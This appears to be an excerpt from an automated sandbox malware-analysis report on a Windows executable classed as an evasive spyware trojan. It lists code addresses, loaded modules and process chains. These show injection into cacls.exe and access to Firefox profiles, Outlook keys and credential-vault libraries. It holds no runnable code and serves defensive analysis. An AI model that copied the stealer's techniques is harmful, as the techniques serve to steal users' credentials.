                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA99506_2_00FA9950
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBB9506_2_00FBB950
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FE5AA06_2_00FE5AA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105FB766_2_0105FB76
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01015BF06_2_01015BF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FDDBF96_2_00FDDBF9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01057A466_2_01057A46
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105FA496_2_0105FA49
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01013A6C6_2_01013A6C
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBFB806_2_00FBFB80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01041AA36_2_01041AA3
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0103DAAC6_2_0103DAAC
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0104DAC66_2_0104DAC6
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01051D5A6_2_01051D5A
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01057D736_2_01057D73
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01019C326_2_01019C32
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBFDC06_2_00FBFDC0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA3D406_2_00FA3D40
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105FCF26_2_0105FCF2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105FF096_2_0105FF09
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA9EB06_2_00FA9EB0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0105FFB16_2_0105FFB1
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FA1F926_2_00FA1F92
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038E03E69_2_038E03E6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0382E3F09_2_0382E3F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DA3529_2_038DA352
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038A02C09_2_038A02C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038C02749_2_038C0274
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038E01AA9_2_038E01AA
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D41A29_2_038D41A2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D81CC9_2_038D81CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038101009_2_03810100
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038BA1189_2_038BA118
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038A81589_2_038A8158
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038B20009_2_038B2000
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0381C7C09_2_0381C7C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038447509_2_03844750
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038207709_2_03820770
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0383C6E09_2_0383C6E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038E05919_2_038E0591
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038205359_2_03820535
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038CE4F69_2_038CE4F6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038C44209_2_038C4420
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D24469_2_038D2446
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D6BD79_2_038D6BD7
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DAB409_2_038DAB40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0381EA809_2_0381EA80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038229A09_2_038229A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038EA9A69_2_038EA9A6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038369629_2_03836962
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038068B89_2_038068B8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0384E8F09_2_0384E8F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038228409_2_03822840
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0382A8409_2_0382A840
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0389EFA09_2_0389EFA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03812FC89_2_03812FC8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0382CFE09_2_0382CFE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03862F289_2_03862F28
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03840F309_2_03840F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038C2F309_2_038C2F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03894F409_2_03894F40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03832E909_2_03832E90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DCE939_2_038DCE93
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DEEDB9_2_038DEEDB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DEE269_2_038DEE26
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03820E599_2_03820E59
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03838DBF9_2_03838DBF
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0381ADE09_2_0381ADE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0382AD009_2_0382AD00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038BCD1F9_2_038BCD1F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038C0CB59_2_038C0CB5
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03810CF29_2_03810CF2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03820C009_2_03820C00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0386739A9_2_0386739A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D132D9_2_038D132D
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0380D34C9_2_0380D34C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038252A09_2_038252A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0383B2C09_2_0383B2C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038C12ED9_2_038C12ED
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0382B1B09_2_0382B1B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038EB16B9_2_038EB16B
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0385516C9_2_0385516C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0380F1729_2_0380F172
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038CF0CC9_2_038CF0CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038270C09_2_038270C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D70E99_2_038D70E9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DF0E09_2_038DF0E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DF7B09_2_038DF7B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D16CC9_2_038D16CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038656309_2_03865630
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038BD5B09_2_038BD5B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038E95C39_2_038E95C3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D75719_2_038D7571
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DF43F9_2_038DF43F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038114609_2_03811460
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0383FB809_2_0383FB80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03895BF09_2_03895BF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0385DBF99_2_0385DBF9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DFB769_2_038DFB76
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03865AA09_2_03865AA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038BDAAC9_2_038BDAAC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038C1AA39_2_038C1AA3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038CDAC69_2_038CDAC6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DFA499_2_038DFA49
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D7A469_2_038D7A46
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03893A6C9_2_03893A6C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038B59109_2_038B5910
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038299509_2_03829950
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0383B9509_2_0383B950
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038238E09_2_038238E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0388D8009_2_0388D800
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03821F929_2_03821F92
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DFFB19_2_038DFFB1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DFF099_2_038DFF09
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_037E3FD59_2_037E3FD5
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_037E3FD29_2_037E3FD2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03829EB09_2_03829EB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0383FDC09_2_0383FDC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03823D409_2_03823D40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D1D5A9_2_038D1D5A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038D7D739_2_038D7D73
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038DFCF29_2_038DFCF2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03899C329_2_03899C32
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BE20209_2_00BE2020
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BDCED09_2_00BDCED0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BDD0F09_2_00BDD0F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BDB0D09_2_00BDB0D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BDB2209_2_00BDB220
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BDB2179_2_00BDB217
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BDB2699_2_00BDB269
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BE57009_2_00BE5700
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BE39009_2_00BE3900
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BFBEC09_2_00BFBEC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360E3AB9_2_0360E3AB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_036152C49_2_036152C4
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360E2889_2_0360E288
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360E7439_2_0360E743
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_036154559_2_03615455
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360CAC39_2_0360CAC3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360D8089_2_0360D808
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0388EA12 appears 86 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0380B970 appears 277 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 03867E54 appears 111 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 03855130 appears 58 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0389F290 appears 105 times
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: String function: 00F8B970 appears 277 times
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: String function: 0100EA12 appears 86 times
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: String function: 00FD5130 appears 58 times
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: String function: 0101F290 appears 105 times
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: String function: 00FE7E54 appears 111 times
                Source: PGK60fNNCZ.exeBinary or memory string: OriginalFilename vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000002.1330153761.0000000003839000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000002.1327100482.0000000002898000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000002.1339554761.00000000058E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000002.1340559054.0000000006E50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000002.1325984551.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000000.1295556947.00000000004EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKThWG.exeL vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000006.00000002.1865960377.000000000108D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000006.00000002.1865306695.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exeBinary or memory string: OriginalFilenameKThWG.exeL vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PGK60fNNCZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/2@5/4
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PGK60fNNCZ.exe.logJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\cacls.exeFile created: C:\Users\user~1\AppData\Local\Temp\t577G2K6Jump to behavior
                Source: PGK60fNNCZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PGK60fNNCZ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2550025861.0000000003436000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.2051969252.0000000003411000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.2049541889.0000000003407000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2550025861.0000000003407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PGK60fNNCZ.exeReversingLabs: Detection: 68%
                Source: PGK60fNNCZ.exeVirustotal: Detection: 79%
                Source: unknownProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"Jump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PGK60fNNCZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PGK60fNNCZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: PGK60fNNCZ.exe, 00000006.00000002.1865306695.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550234246.0000000000C98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: PGK60fNNCZ.exe, 00000006.00000002.1865306695.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550234246.0000000000C98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QxPduTOtZWkp.exe, 00000008.00000000.1787927028.00000000007FE000.00000002.00000001.01000000.0000000D.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2548675572.00000000007FE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: PGK60fNNCZ.exe, 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1865016088.0000000003485000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1867375010.0000000003632000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PGK60fNNCZ.exe, PGK60fNNCZ.exe, 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1865016088.0000000003485000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1867375010.0000000003632000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_027CE520 push eax; retf 0_2_027CE521
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_059BC160 push es; iretd 0_2_059BC161
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_059B2D7F push es; iretd 0_2_059B2D8E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_059B6830 pushad ; iretd 0_2_059B6837
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004148D4 push cs; iretd 6_2_004148D7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0042E1F3 push edi; ret 6_2_0042E1FC
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00419391 push cs; retf 6_2_00419392
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0040AD51 push ebx; retf 6_2_0040AD54
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00411D86 push ds; retf 6_2_00411D9F
